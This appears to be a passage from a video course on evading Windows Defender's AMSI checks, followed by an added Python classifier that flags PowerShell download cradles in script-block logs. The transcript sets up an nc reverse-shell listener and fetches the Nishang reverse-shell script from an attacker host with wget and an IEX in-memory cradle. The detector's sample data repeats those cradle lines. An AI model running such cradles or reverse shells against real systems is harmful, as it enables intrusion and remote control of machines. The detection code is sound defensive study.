From the course: Defeating Windows Defender
Disrupting the AmsiOpenSession function
- [Instructor] Our objective in this video is to demonstrate how we can bypass the AMSI checks by setting up a reverse shell. Note that we have a web service open in Kali already, and we'll now set up a listener for our reverse shell with nc -lp on port 4444. We didn't have much luck downloading our msfvenom command-line shell. However, we can run a reverse shell from within PowerShell by using the Nishang PowerShellTcp script from the website shown here. I've downloaded this script onto my Kali system, so let's try to download it from there. I've got a PowerShell session open in Windows 11, so we can run wget http://192.168.1.249:8000/Invoke-PowerShellTcp.ps1 -OutFile Invoke-PowerShellTcp.ps1. And we get it, but we're stopped by Defender. One of the strategies for defeating Defender is to run scripts in memory and not write them to disk. We can do this with PowerShell scripts by using the IEX command. Let's try this for PowerShellTcp: IEX New-Object Net.WebClient…
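The in-memory cradle the instructor moves to (IEX over Net.WebClient) sidesteps the on-disk file scan that blocked the wget download, but it does not sidestep AMSI: PowerShell hands the downloaded text to AMSI when it compiles it, and script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records that same text. As an added example that is not part of the course, here is a small Python classifier run over constructed ScriptBlockText samples (the host names and every URL except the course's lab address are made up) that separates the download-to-disk attempt from the in-memory cradle, the distinction the video turns on:

```python
import re

# Constructed sample ScriptBlockText values, shaped like the field that PowerShell
# script block logging writes to Event ID 4104. They are made up for this example;
# the lab IP and script name follow the course, the rest is invented.
SAMPLE_SCRIPT_BLOCKS = [
    ("admin-host",  "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    ("win11-lab",   "wget http://192.168.1.249:8000/Invoke-PowerShellTcp.ps1 -OutFile Invoke-PowerShellTcp.ps1"),
    ("win11-lab",   "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.249:8000/Invoke-PowerShellTcp.ps1')"),
    ("win11-lab",   "iex (nEw-oBjEcT nEt.WeBcLiEnT).dOwNlOaDsTrInG('http://192.168.1.249:8000/x.ps1')"),
    ("build-agent", "Invoke-WebRequest https://example.internal/pkg.zip -OutFile pkg.zip"),
    ("win11-lab",   "Invoke-Expression (Invoke-RestMethod -Uri http://192.168.1.249:8000/Invoke-PowerShellTcp.ps1)"),
]

# Cmdlets, their aliases, and .NET members that fetch remote content.
DOWNLOAD_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|wget|curl|Invoke-RestMethod|irm)\b"
    r"|Net\.WebClient|DownloadString|DownloadFile|DownloadData|Net\.Http\.HttpClient",
    re.IGNORECASE,
)
# Execution of a string as script: the half of the cradle that hands the text to AMSI.
EXEC_RE = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.IGNORECASE)
# Parameter that writes the response to disk, where the file scanner (not AMSI) sees it.
OUTFILE_RE = re.compile(r"-OutFile\b", re.IGNORECASE)
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"()]+", re.IGNORECASE)


def normalize(script_block: str) -> str:
    """Undo the cheapest obfuscations: backtick escapes inside barewords (I`EX) are
    removed here, and case randomization is handled by matching case-insensitively.
    String concatenation ('Down'+'loadString') is deliberately not handled."""
    return script_block.replace("`", "")


def classify(script_block: str) -> dict:
    """Label one script block. Returns a dict with the verdict (or None), the URLs
    seen, and whether the fetched content was written to disk."""
    text = normalize(script_block)
    has_exec = EXEC_RE.search(text) is not None
    has_download = DOWNLOAD_RE.search(text) is not None
    to_disk = OUTFILE_RE.search(text) is not None
    if has_exec and has_download:
        verdict = "in-memory download cradle"      # never touches disk; AMSI still sees it
    elif has_download and to_disk:
        verdict = "remote file written to disk"    # what blocked the wget in the video
    elif has_download:
        verdict = "remote fetch"
    else:
        verdict = None
    return {"verdict": verdict, "urls": URL_RE.findall(text), "to_disk": to_disk}


def scan_blocks(blocks):
    """Return (host, verdict, urls) for every block that warrants a look."""
    findings = []
    for host, block in blocks:
        result = classify(block)
        if result["verdict"] is not None:
            findings.append((host, result["verdict"], result["urls"]))
    return findings


if __name__ == "__main__":
    for host, verdict, urls in scan_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"{host:12} {verdict:28} {' '.join(urls)}")
```

In a real deployment the blocks would come from Get-WinEvent or a SIEM query on Event ID 4104 rather than an inline list, and the rules here are a starting point only: they catch case randomization and backtick escapes, but not string concatenation, format-string tricks, or reflection-based tampering with amsi.dll itself.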